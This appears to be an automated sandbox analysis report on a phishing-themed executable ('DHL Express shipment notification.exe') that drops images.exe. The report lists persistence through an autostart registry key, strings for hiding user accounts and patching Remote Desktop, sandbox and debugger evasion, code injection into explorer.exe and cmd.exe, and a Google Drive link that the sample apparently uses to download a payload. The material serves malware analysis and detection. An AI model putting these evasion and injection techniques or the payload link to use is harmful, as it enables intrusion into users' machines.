Source: Yara match	File source: 0000001D.00000000.1167143937.0000000001660000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.740062045.0000000002280000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000000.738081811.0000000001660000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.1170292211.0000000002280000.00000040.00000001.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\DHL Express shipment notification.exe	Code function: 5_2_00406464 push edx; iretd	5_2_0040647C
Source: C:\Users\user\Desktop\DHL Express shipment notification.exe	Code function: 5_2_0040A07F push ds; iretd	5_2_0040A095
Source: C:\Users\user\Desktop\DHL Express shipment notification.exe	Code function: 5_2_004070A2 push 3E0AA415h; retf	5_2_004070B7
Source: C:\Users\user\Desktop\DHL Express shipment notification.exe	Code function: 5_2_00403976 pushfd ; ret	5_2_0040398B
Source: C:\Users\user\Desktop\DHL Express shipment notification.exe	Code function: 5_2_022826FB push eax; iretd	5_2_022826FC
Source: C:\Users\user\Desktop\DHL Express shipment notification.exe	Code function: 5_2_02284C6D push eax; iretd	5_2_02284C6F
Source: C:\Users\user\Desktop\DHL Express shipment notification.exe	Code function: 5_2_022810E0 push es; retf 55A4h	5_2_0228F640
Source: C:\ProgramData\images.exe	Code function: 21_2_00406464 push edx; iretd	21_2_0040647C
Source: C:\ProgramData\images.exe	Code function: 21_2_0040A07F push ds; iretd	21_2_0040A095
Source: C:\ProgramData\images.exe	Code function: 21_2_004070A2 push 3E0AA415h; retf	21_2_004070B7
Source: C:\ProgramData\images.exe	Code function: 21_2_00403976 pushfd ; ret	21_2_0040398B
Source: C:\ProgramData\images.exe	Code function: 21_2_022826FB push eax; iretd	21_2_022826FC
Source: C:\ProgramData\images.exe	Code function: 21_2_02284C6D push eax; iretd	21_2_02284C6F
Source: C:\ProgramData\images.exe	Code function: 21_2_022810E0 push es; retf 55A4h	21_2_0228F640

Source: C:\Users\user\Desktop\DHL Express shipment notification.exe

File created: C:\ProgramData\images.exe

Jump to dropped file

Source: C:\Users\user\Desktop\DHL Express shipment notification.exe

File created: C:\ProgramData\images.exe

Jump to dropped file

Boot Survival:

Creates an undocumented autostart registry key

Show sources

Source: C:\Windows\SysWOW64\reg.exe

Key value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Load

Jump to behavior

Hooking and other Techniques for Hiding and Protection:

Contains functionality to hide user accounts

Show sources

Source: DHL Express shipment notification.exe, 0000000E.00000003.907384773.0000000001A02000.00000004.00000001.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: DHL Express shipment notification.exe, 0000000E.00000003.907384773.0000000001A02000.00000004.00000001.sdmp	String found in binary or memory: 0.rudp\ICACLS.exe\xcopy.exe "" /GRANT:r *S-1-1-0:(OI)(CI)F /T\AppData\Local\Google\AppData\Local\Google\xcopy.exe /Y /E /C \AppData\Roaming\Mozilla\AppData\Roaming\Mozilla\\AppData\Roaming\Microsoft\AppData\Roaming\Microsoft\\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\TermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameTypemultirdp[experimental] patch Terminal Server service to allow multiples userstermsrv.dllexplorer.exeTASKmgr.exeProcessHacker.exeregedit.exentdll.dllLdrGetProcedureAddressRtlNtStatusToDosErrorRtlSetLastWin32ErrorNtAllocateVirtualMemoryNtProtectVirtualMemoryNtWriteVirtualMemoryLdrLoadDllRtlCreateUserThread
Source: DHL Express shipment notification.exe, 0000000E.00000003.907015214.00000000019AE000.00000004.00000001.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: DHL Express shipment notification.exe, 0000000E.00000003.907015214.00000000019AE000.00000004.00000001.sdmp	String found in binary or memory: 0.rudp\ICACLS.exe\xcopy.exe "" /GRANT:r *S-1-1-0:(OI)(CI)F /T\AppData\Local\Google\AppData\Local\Google\xcopy.exe /Y /E /C \AppData\Roaming\Mozilla\AppData\Roaming\Mozilla\\AppData\Roaming\Microsoft\AppData\Roaming\Microsoft\\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\TermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameTypemultirdp[experimental] patch Terminal Server service to allow multiples userstermsrv.dllexplorer.exeTASKmgr.exeProcessHacker.exeregedit.exentdll.dllLdrGetProcedureAddressRtlNtStatusToDosErrorRtlSetLastWin32ErrorNtAllocateVirtualMemoryNtProtectVirtualMemoryNtWriteVirtualMemoryLdrLoadDllRtlCreateUserThread
Source: DHL Express shipment notification.exe, 0000000E.00000003.907561845.0000000001A08000.00000004.00000001.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: DHL Express shipment notification.exe, 0000000E.00000003.907561845.0000000001A08000.00000004.00000001.sdmp	String found in binary or memory: 0.rudp\ICACLS.exe\xcopy.exe "" /GRANT:r *S-1-1-0:(OI)(CI)F /T\AppData\Local\Google\AppData\Local\Google\xcopy.exe /Y /E /C \AppData\Roaming\Mozilla\AppData\Roaming\Mozilla\\AppData\Roaming\Microsoft\AppData\Roaming\Microsoft\\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\TermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameTypemultirdp[experimental] patch Terminal Server service to allow multiples userstermsrv.dllexplorer.exeTASKmgr.exeProcessHacker.exeregedit.exentdll.dllLdrGetProcedureAddressRtlNtStatusToDosErrorRtlSetLastWin32ErrorNtAllocateVirtualMemoryNtProtectVirtualMemoryNtWriteVirtualMemoryLdrLoadDllRtlCreateUserThread
Source: images.exe, 0000001D.00000003.1348162067.00000000018CB000.00000004.00000001.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: images.exe, 0000001D.00000003.1348162067.00000000018CB000.00000004.00000001.sdmp	String found in binary or memory: 0.rudp\ICACLS.exe\xcopy.exe "" /GRANT:r *S-1-1-0:(OI)(CI)F /T\AppData\Local\Google\AppData\Local\Google\xcopy.exe /Y /E /C \AppData\Roaming\Mozilla\AppData\Roaming\Mozilla\\AppData\Roaming\Microsoft\AppData\Roaming\Microsoft\\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\TermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameTypemultirdp[experimental] patch Terminal Server service to allow multiples userstermsrv.dllexplorer.exeTASKmgr.exeProcessHacker.exeregedit.exentdll.dllLdrGetProcedureAddressRtlNtStatusToDosErrorRtlSetLastWin32ErrorNtAllocateVirtualMemoryNtProtectVirtualMemoryNtWriteVirtualMemoryLdrLoadDllRtlCreateUserThread
Source: images.exe, 0000001D.00000003.1348433470.00000000018D9000.00000004.00000001.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: images.exe, 0000001D.00000003.1348433470.00000000018D9000.00000004.00000001.sdmp	String found in binary or memory: 0.rudp\ICACLS.exe\xcopy.exe "" /GRANT:r *S-1-1-0:(OI)(CI)F /T\AppData\Local\Google\AppData\Local\Google\xcopy.exe /Y /E /C \AppData\Roaming\Mozilla\AppData\Roaming\Mozilla\\AppData\Roaming\Microsoft\AppData\Roaming\Microsoft\\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\TermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameTypemultirdp[experimental] patch Terminal Server service to allow multiples userstermsrv.dllexplorer.exeTASKmgr.exeProcessHacker.exeregedit.exentdll.dllLdrGetProcedureAddressRtlNtStatusToDosErrorRtlSetLastWin32ErrorNtAllocateVirtualMemoryNtProtectVirtualMemoryNtWriteVirtualMemoryLdrLoadDllRtlCreateUserThread
Source: images.exe, 0000001D.00000003.1347991515.00000000018AC000.00000004.00000001.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: images.exe, 0000001D.00000003.1347991515.00000000018AC000.00000004.00000001.sdmp	String found in binary or memory: 0.rudp\ICACLS.exe\xcopy.exe "" /GRANT:r *S-1-1-0:(OI)(CI)F /T\AppData\Local\Google\AppData\Local\Google\xcopy.exe /Y /E /C \AppData\Roaming\Mozilla\AppData\Roaming\Mozilla\\AppData\Roaming\Microsoft\AppData\Roaming\Microsoft\\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\TermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameTypemultirdp[experimental] patch Terminal Server service to allow multiples userstermsrv.dllexplorer.exeTASKmgr.exeProcessHacker.exeregedit.exentdll.dllLdrGetProcedureAddressRtlNtStatusToDosErrorRtlSetLastWin32ErrorNtAllocateVirtualMemoryNtProtectVirtualMemoryNtWriteVirtualMemoryLdrLoadDllRtlCreateUserThread

Hides that the sample has been downloaded from the Internet (zone.identifier)

Show sources

Source: C:\Users\user\Desktop\DHL Express shipment notification.exe

File opened: C:\ProgramData\images.exe:Zone.Identifier read attributes | delete

Jump to behavior

Source: C:\Users\user\Desktop\DHL Express shipment notification.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Express shipment notification.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Express shipment notification.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Express shipment notification.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Express shipment notification.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\images.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\images.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\images.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\images.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\images.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\images.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\images.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Tries to detect Any.run

Show sources

Source: C:\Users\user\Desktop\DHL Express shipment notification.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Users\user\Desktop\DHL Express shipment notification.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior
Source: C:\Users\user\Desktop\DHL Express shipment notification.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Users\user\Desktop\DHL Express shipment notification.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior
Source: C:\ProgramData\images.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\ProgramData\images.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior
Source: C:\ProgramData\images.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\ProgramData\images.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: DHL Express shipment notification.exe, 00000005.00000002.740302767.0000000002430000.00000004.00000001.sdmp, images.exe, 00000015.00000002.1170610776.0000000002A20000.00000004.00000001.sdmp	Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=WINDIR=\SYSWOW64\MSHTML.DLL
Source: DHL Express shipment notification.exe, 0000000E.00000002.1022206078.0000000003310000.00000004.00000001.sdmp	Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=HTTPS://DRIVE.GOOGLE.COM/UC?EXPORT=DOWNLOAD&ID=1WMEKQGVHTBFHUC179QEYSF4NUF_7RF9G
Source: DHL Express shipment notification.exe, 00000005.00000002.740302767.0000000002430000.00000004.00000001.sdmp, DHL Express shipment notification.exe, 0000000E.00000002.1022206078.0000000003310000.00000004.00000001.sdmp, images.exe, 00000015.00000002.1170610776.0000000002A20000.00000004.00000001.sdmp	Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE

Source: C:\Users\user\Desktop\DHL Express shipment notification.exe TID: 1548	Thread sleep count: 70 > 30	Jump to behavior
Source: C:\ProgramData\images.exe TID: 2660	Thread sleep count: 70 > 30	Jump to behavior
Source: C:\ProgramData\images.exe TID: 3252	Thread sleep count: 364 > 30	Jump to behavior
Source: C:\ProgramData\images.exe TID: 3252	Thread sleep time: -364000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe TID: 2592	Thread sleep count: 3901 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe TID: 2592	Thread sleep time: -46812000s >= -30000s	Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\cmd.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\cmd.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\DHL Express shipment notification.exe

Code function: 5_2_02293692 rdtsc

5_2_02293692

Source: C:\ProgramData\images.exe	Window / User API: threadDelayed 364			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Window / User API: threadDelayed 3901			Jump to behavior

Source: C:\Users\user\Desktop\DHL Express shipment notification.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\DHL Express shipment notification.exe

System information queried: ModuleInformation

Jump to behavior

Source: DHL Express shipment notification.exe, 00000005.00000002.741442541.0000000002DA9000.00000004.00000001.sdmp, DHL Express shipment notification.exe, 0000000E.00000002.1022285511.00000000033D9000.00000004.00000001.sdmp, images.exe, 00000015.00000002.1171933983.0000000002D59000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Guest Shutdown Service
Source: DHL Express shipment notification.exe, 00000005.00000002.741442541.0000000002DA9000.00000004.00000001.sdmp, DHL Express shipment notification.exe, 0000000E.00000002.1022285511.00000000033D9000.00000004.00000001.sdmp, images.exe, 00000015.00000002.1171933983.0000000002D59000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Remote Desktop Virtualization Service
Source: images.exe, 00000015.00000002.1171933983.0000000002D59000.00000004.00000001.sdmp	Binary or memory string: vmicshutdown
Source: DHL Express shipment notification.exe, 00000005.00000002.741442541.0000000002DA9000.00000004.00000001.sdmp, DHL Express shipment notification.exe, 0000000E.00000002.1022285511.00000000033D9000.00000004.00000001.sdmp, images.exe, 00000015.00000002.1171933983.0000000002D59000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Volume Shadow Copy Requestor
Source: DHL Express shipment notification.exe, 0000000E.00000002.1022206078.0000000003310000.00000004.00000001.sdmp	Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=https://drive.google.com/uc?export=download&id=1wMeKQgvhtbFhUc179qeysF4NuF_7Rf9g
Source: DHL Express shipment notification.exe, 00000005.00000002.741442541.0000000002DA9000.00000004.00000001.sdmp, DHL Express shipment notification.exe, 0000000E.00000002.1022285511.00000000033D9000.00000004.00000001.sdmp, images.exe, 00000015.00000002.1171933983.0000000002D59000.00000004.00000001.sdmp	Binary or memory string: Hyper-V PowerShell Direct Service
Source: DHL Express shipment notification.exe, 00000005.00000002.741442541.0000000002DA9000.00000004.00000001.sdmp, DHL Express shipment notification.exe, 0000000E.00000002.1022285511.00000000033D9000.00000004.00000001.sdmp, images.exe, 00000015.00000002.1171933983.0000000002D59000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Time Synchronization Service
Source: images.exe, 00000015.00000002.1171933983.0000000002D59000.00000004.00000001.sdmp	Binary or memory string: vmicvss
Source: DHL Express shipment notification.exe, 0000000E.00000002.1021014003.00000000019A3000.00000004.00000020.sdmp, explorer.exe, 0000000F.00000000.936184682.000000000DA04000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.987848818.000000000DA04000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000002.5701113978.000000000D7F0000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.985595787.000000000D7F0000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000002.5703739308.000000000DA04000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.934050366.000000000D7F0000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW
Source: DHL Express shipment notification.exe, 0000000E.00000002.1020504850.0000000001947000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAWH
Source: DHL Express shipment notification.exe, 00000005.00000002.740302767.0000000002430000.00000004.00000001.sdmp, DHL Express shipment notification.exe, 0000000E.00000002.1022206078.0000000003310000.00000004.00000001.sdmp, images.exe, 00000015.00000002.1170610776.0000000002A20000.00000004.00000001.sdmp	Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: DHL Express shipment notification.exe, 00000005.00000002.741442541.0000000002DA9000.00000004.00000001.sdmp, DHL Express shipment notification.exe, 0000000E.00000002.1022285511.00000000033D9000.00000004.00000001.sdmp, images.exe, 00000015.00000002.1171933983.0000000002D59000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Data Exchange Service
Source: explorer.exe, 0000000F.00000000.987347269.000000000D995000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.935700971.000000000D995000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000002.5703169506.000000000D995000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW`
Source: DHL Express shipment notification.exe, 00000005.00000002.741442541.0000000002DA9000.00000004.00000001.sdmp, DHL Express shipment notification.exe, 0000000E.00000002.1022285511.00000000033D9000.00000004.00000001.sdmp, images.exe, 00000015.00000002.1171933983.0000000002D59000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Heartbeat Service
Source: DHL Express shipment notification.exe, 00000005.00000002.741442541.0000000002DA9000.00000004.00000001.sdmp, DHL Express shipment notification.exe, 0000000E.00000002.1022285511.00000000033D9000.00000004.00000001.sdmp, images.exe, 00000015.00000002.1171933983.0000000002D59000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Guest Service Interface
Source: images.exe, 00000015.00000002.1171933983.0000000002D59000.00000004.00000001.sdmp	Binary or memory string: vmicheartbeat
Source: DHL Express shipment notification.exe, 00000005.00000002.740302767.0000000002430000.00000004.00000001.sdmp, images.exe, 00000015.00000002.1170610776.0000000002A20000.00000004.00000001.sdmp	Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=windir=\syswow64\mshtml.dll

Anti Debugging:

Hides threads from debuggers

Show sources

Source: C:\Users\user\Desktop\DHL Express shipment notification.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\Desktop\DHL Express shipment notification.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\ProgramData\images.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\ProgramData\images.exe	Thread information set: HideFromDebugger	Jump to behavior

Source: C:\Users\user\Desktop\DHL Express shipment notification.exe

Code function: 5_2_02293692 rdtsc

5_2_02293692

Source: C:\Users\user\Desktop\DHL Express shipment notification.exe	Code function: 5_2_02292A85 mov eax, dword ptr fs:[00000030h]	5_2_02292A85
Source: C:\Users\user\Desktop\DHL Express shipment notification.exe	Code function: 5_2_02291E86 mov eax, dword ptr fs:[00000030h]	5_2_02291E86
Source: C:\Users\user\Desktop\DHL Express shipment notification.exe	Code function: 5_2_0228CF89 mov eax, dword ptr fs:[00000030h]	5_2_0228CF89
Source: C:\Users\user\Desktop\DHL Express shipment notification.exe	Code function: 5_2_022949D1 mov eax, dword ptr fs:[00000030h]	5_2_022949D1
Source: C:\ProgramData\images.exe	Code function: 21_2_02292A85 mov eax, dword ptr fs:[00000030h]	21_2_02292A85
Source: C:\ProgramData\images.exe	Code function: 21_2_02291E86 mov eax, dword ptr fs:[00000030h]	21_2_02291E86
Source: C:\ProgramData\images.exe	Code function: 21_2_0228CF89 mov eax, dword ptr fs:[00000030h]	21_2_0228CF89
Source: C:\ProgramData\images.exe	Code function: 21_2_022949D1 mov eax, dword ptr fs:[00000030h]	21_2_022949D1
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 39_2_00D2001A mov eax, dword ptr fs:[00000030h]	39_2_00D2001A

Source: C:\Users\user\Desktop\DHL Express shipment notification.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\DHL Express shipment notification.exe	Process queried: DebugPort	Jump to behavior
Source: C:\ProgramData\images.exe	Process queried: DebugPort	Jump to behavior
Source: C:\ProgramData\images.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Users\user\Desktop\DHL Express shipment notification.exe

Code function: 5_2_02296860 RtlAddVectoredExceptionHandler,

5_2_02296860

HIPS / PFW / Operating System Protection Evasion:

Writes to foreign memory regions

Show sources

Source: C:\Users\user\Desktop\DHL Express shipment notification.exe	Memory written: C:\Windows\explorer.exe base: 33370000	Jump to behavior
Source: C:\Users\user\Desktop\DHL Express shipment notification.exe	Memory written: C:\Windows\explorer.exe base: 134B0000	Jump to behavior
Source: C:\ProgramData\images.exe	Memory written: C:\Windows\SysWOW64\cmd.exe base: D20000	Jump to behavior
Source: C:\ProgramData\images.exe	Memory written: C:\Windows\SysWOW64\cmd.exe base: 3200000	Jump to behavior

Allocates memory in foreign processes

Show sources

Source: C:\Users\user\Desktop\DHL Express shipment notification.exe	Memory allocated: C:\Windows\explorer.exe base: 134B0000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\DHL Express shipment notification.exe	Memory allocated: C:\Windows\explorer.exe base: 33370000 protect: page execute and read and write	Jump to behavior
Source: C:\ProgramData\images.exe	Memory allocated: C:\Windows\SysWOW64\cmd.exe base: D20000 protect: page execute and read and write	Jump to behavior
Source: C:\ProgramData\images.exe	Memory allocated: C:\Windows\SysWOW64\cmd.exe base: 3200000 protect: page read and write	Jump to behavior

Injects code into the Windows Explorer (explorer.exe)

Show sources

Source: C:\Users\user\Desktop\DHL Express shipment notification.exe	Memory written: PID: 4856 base: 33370000 value: 58			Jump to behavior
Source: C:\Users\user\Desktop\DHL Express shipment notification.exe	Memory written: PID: 4856 base: 134B0000 value: E8			Jump to behavior

Creates a thread in another existing process (thread injection)

Show sources

Source: C:\ProgramData\images.exe

Thread created: C:\Windows\SysWOW64\cmd.exe EIP: D2010E

Jump to behavior

